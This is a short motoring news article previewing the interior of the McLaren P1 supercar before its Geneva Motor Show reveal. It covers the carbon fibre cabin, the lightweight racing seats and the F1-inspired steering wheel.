McLaren has released the first photographs of what the interior of its forthcoming P1 supercar will look like.

The production-ready P1 is due to be revealed at the Geneva Motor Show next month, and this represents the first chance we’ve had to look inside the British company’s new monster.

McLaren promises a driver-focused, minimalist cabin with plenty of unlaquered carbon fibre to maximise weight saving – removing the laquer takes off 1.5kg. Every little helps. The design inspiration has come from a fighter jet cockpit, and the designers have sought to cocoon the pilot with a glass canopy overhead and a windscreen deeper than it is wide, for maximum visibility.

Comfort features include climate control, satellite navigation and a Meridian sound system, but the amount of trim is minimal, with many parts of the car exposed. There’s no interior sound deadening and even carpet is only an option.

Racing bucket seats are fitted using minimal foam and thin carbon fibre shells, weighing only 10.5kg in total. The seat backs are fixed to 28 degrees from vertical, but can be set to 32 degrees to give more helmet room, as the P1 has been designed for the track from the outset. The height of each seat will be custom set to each driver and passenger, and there are fixings for six-point race harnesses as well as regular seat belts.

The steering wheel has been computer modelled on the grip of McLaren’s Formula 1 world champions, and is finished in Alcantara and carbon fibre.

Looks sexy. Luckily, we’ll be getting even more details over the coming couple of weeks, ahead of the full reveal at Geneva. Stay tuned!
